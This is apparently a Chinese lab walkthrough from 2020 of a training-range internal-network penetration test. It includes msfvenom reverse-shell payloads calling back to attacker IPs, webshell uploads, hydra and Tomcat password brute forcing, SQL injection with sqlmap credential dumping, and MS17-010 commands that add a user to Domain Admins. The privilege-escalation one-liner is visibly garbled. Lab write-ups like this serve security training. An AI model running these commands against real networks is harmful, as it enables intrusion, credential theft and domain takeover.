记一次糟心的内网靶场实战 – 作者:Sweetmelon

菜鸡又来发表文章了,一开始的时候对整个内网的拓扑结构还不熟,所以做的时候很乱,写的也很乱。有很多方法都没有想到去用。qaq大佬们多多指教。

一、环境准备

用网线连接交换机

配置Winodwss攻击机IP为172.16.6.203

攻击机Kali IP为172.16.6.202

主机IP为172.16.6.201

网关为172.16.6.1

子网掩码255.255.255.0

目标IP 172.16.6.10

二、渗透具体流程

总览拓扑图

一开始以为192.168.6.200,一台普通的双网卡主机,没有发现是防火墙,所以10.1.1.0网段的主机拓扑不够清晰,后来老师讲了才知道,防火墙做了端口映射。E主机的445端口映射到防火墙445端口,F主机的3389端口映射到防火墙的3389端口。

1603702883_5f96906316cd5649ae55a.png!small?1603702883315

攻击目标172.16.6.10

1、菜刀连接

访问主页。发现伪协议注入点。

http://172.16.6.10/index.php?page=php://input

使用菜刀连接,菜刀版本需2020年的版本。

1603702891_5f96906ba14540b272e0d.png!small?1603702891832

2、生成并上传木马且回连meterpreter

查看phpinfo目标主机为Linux系统的主机。

1603702902_5f9690763bdcb364757b6.png!small?1603702902491

Msf生成木马msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.147  LPORT=2337  -f elf -a x86 –platform linux -o /home/hula.elf

并use exploit/multi/handle模块监听木马回连情况。

将木马通过菜刀上传木马,赋予运行权限,然后执行。

发现回连到meterpreter。

3、内网信息收集(同时添加路由并建立socks代理)

ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10。

自动添加路由run post/multi/manage/autoroute。

添加路由与代理:

use auxiliary/server/socks4a

show options

set srvhost 172.16.6.147

set srvport 1080

使用portscan模块进行端口扫描

search portscan

set rhosts 192.168.6.0/24。

1603702910_5f96907e59f23b6f94e64.png!small?1603702910801

ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10

给msf添加192.168.6.10段的路由,run autoroute -s 192.168.6.0/24

添加代理:

use auxiliary/server/socks4a

show options

srvhost设为本机

srvport默认1080

可以看到扫描出15、16、17、200四台主机,端口开放情况为

192.168.6.15      21/22

192.168.6.16      22/80/3306/8080

192.168.6.17        22/80/3306

192.168.6.200      80/135/445/3389

4、尝试本机提权

用一句话提权

printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever exploit.conf” staprun -u whatever> exploit.conf; MODPROBE_OPTIONS=”-C

1603702920_5f969088e2c9d504536a3.png!small?1603702921237

攻击目标192.168.6.15

1、hydra爆破ftp账号

因为目标机开放了21端口,用hydra爆破ftp弱密码。

proxychains hydra -L /usr/wordlists/字典/Usernames/top_shortlist.txt -P /usr/wordlists/rockyou.txt -f -t 50 -vV ssh://192.168.6.15 -o ./ssh.log

爆破出账号为admin,密码为123456

2、登录ftp服务

proxychains ftp 192.168.6.15,登陆后用dir命令发现报错

使用xshell连接,发现可以连接。

攻击目标192.168.6.16

1、发现tomcat

由于目标主机开发了8080端口,猜测有tomcat漏洞。

访问网页192.168.6.16:8080发现有tomcat页面。

2、MSF爆破tomcat密码

下面尝试利用MSF爆破tomcat的账号密码,利用auxiliary/scanner/http/tomcat_mgr_login模块,除了设置目标IP,用户名字典,密码字典外,再设置stop_on_success为true,意思是baopochen成功后停止。

默认管理后台路径为manager/html,也不用改,端口也不用改。成功爆破得到账号密码为tomcat/tomcat

3、继续攻击取得shell

使用msf中upload、deploy两个模块的tomcat漏洞发现无法绑定IP和端口。

1603702933_5f969095c172c933b110c.png!small?1603702934103

1603702945_5f9690a1bda2437bfaa83.png!small?1603702946124

使用msf生成war木马文件。然后使用监听模块监听木马回连情况。

msfvenom -p java/meterpreter/reverse _tcp LHOST=192.168.6.10 LPORT=20003 -f war > lmx3.war

在下面的页面上传war木马文件。

1603702953_5f9690a901c114c733473.png!small?1603702953190

在网页上查看自己的木马,返回msf发现已返回meterpreter

1603702958_5f9690aed7eee8ad5d427.png!small?1603702959186

攻击目标192.168.6.17

1、SQL注入进后台

访问该站点。

kali下敏感目录扫描工具Nikto使用:攻击机:172.16.6.147(kali linux)、靶机:192.168.6.17 ( Metasploitable2-Linux)、使用Nikto 进行敏感目录扫描、参数解析:-h/-host 指定域名或者IP、发现这个敏感目录扫描不够强大。

1603702975_5f9690bf857074a50fed5.png!small?1603702975895

发现sql注入点http://192.168.6.17/message.php?id=

用手工简单的测试了下:

http://192.168.6.17/message.php?id=1 页面正常

http://192.168.6.17/message.php?id=1 order by 1页面正常

http://192.168.6.17/message.php?id=1 order by 100页面不正常

所以存在注入漏洞

1603702982_5f9690c62278d8e3aef7d.png!small?1603702982382

sqlmap跑出数据库的密码

proxychains sqlmap -r /home/17tou.txt –batch –dbs

1603703030_5f9690f6bcc9574bbd78b.png!small?1603703031171

proxychains sqlmap -r /home/17tou.txt –batch –dbs -T admin –dump

1603703025_5f9690f112c967b184e56.png!small?1603703025238

最后爆出账号是admin,密码是xxxxxxx,使用md5解密

利用账号密码成功登录192.168.6.17的后台

1603703076_5f969124289eeb7e7c5c0.png!small?1603703076315

2、MSF生成php木马反弹meterpreter

浏览页面,发现有一个文件上传的注入点。上传木马,f12发现木马上传的位置与命名。

http://192.168.6.17/upload/images/20201022123044.php

1603703088_5f969130cb5a8ef3ae0f8.png!small?1603703089180

在win10上安装sockscap,管理员身份运行,代理设置kali的IP地址,端口1080。在sockscap上添加菜刀程序。使用菜刀连接木马。

1603703093_5f969135d8af7b85df154.png!small?1603703094215

2、MSF生成php木马反弹meterpreter

通过菜刀连接,发现目标主机为Linux系统。

用MSF生成的反弹木马,然后起监听。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.6.10 LPORT=2339 -f elf -a x86 –platform linux -o /home/biu.elf

通过菜刀上传到目标主机,赋予权限,然后运行。发现不能弹回meterpreter。

攻击目标192.168.6.200

1、尝试访问web服务

因为发现目标开放了80,所以访问下web站点

在kali自带的火狐浏览器中设置socks代理,访问192.168.6.200,发现页面提示输入账号密码。尝试了弱口令的账号密码,发现无法人工爆破。

2、永恒之蓝攻击

由于目标开放了445端口,所以怀疑可能存在永恒之蓝漏洞。

使用ms17-010的command模块进行攻击。

添加用户,并添加至管理员组(或者直接修改administrator管理员密码)

set command ‘net user cbr Cbr123456 /add‘

set command ‘net “Domain Admins” cbr /add /domain’

用命令set command ‘net group “Domain Admins”‘来查看是否成功添加到域管理员组。

3、远程登录

proxychains rdesktop 192.168.6.200

查看IP信息ipconfig /all,发现目标主机在域里面。网关为10.1.1.1,还有一个地址为10.1.1.200,以为目标主机位双网卡,但没有发现目标主机的地址192.168.6.200的存在,惊天大怪事啊。后来讲解的时候才知道,这里是做了端口映射。

1603703103_5f96913f805411c66e9a1.png!small?1603703103782

攻击域成员机10.1.1.200

1、创建用户并加入到域管理员组

由于目标开放了445端口,所以怀疑可能存在永恒之蓝漏洞。

继续用17010执行高权限命令的模块进行攻击:

添加用户,并添加至管理员组(或者直接修改administrator管理员密码)

set command ‘net user cbr Cbr123456 /add‘

set command ‘net “Domain Admins” cbr /add /domain’

用命令set command ‘net group “Domain Admins”‘来查看是否成功添加到域管理员组。

发现已经成功添加到域管理员组

1603703143_5f969167b39fd069999bd.png!small?1603703144123

2、用创建的域管理员登录域环境

远程登录10.1.1.200

使用共享文件proxychains rdesktop 10.1.1.200 -r disk:aa=/home

远程登录administrator

上传木马并运行,发现meterpreter弹不回来,遂放弃

攻击域控10.1.1.10

1、猜测端口转发

以10.1.1.10为目标地址,使用msf的ms17-010模块攻击,发现操作并没有在10.1.1.10上执行,而是在192.168.6.200上执行。猜测是进行了端口映射。

所以将192.168.6.200作为中间机器,使用lcx,但发现无法实现端口转发。

1603703150_5f96916ed035c9639261d.png!small?1603703151082

使用xshell建立192.168.6.200与10.1.1.10之间的隧道,但发、法建立。遂放弃。

1603703155_5f96917386c96515b300d.png!small?1603703155720

最后

通过ms17-010的command模块可以添加用户,但是command后面的指令要加单引号,因为是长命令。

远程登录10.1.1.10

1603703161_5f969179e59bf2f9b73fe.png!small?1603703162236

来源:freebuf.com 2020-10-26 17:12:29 by: Sweetmelon

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论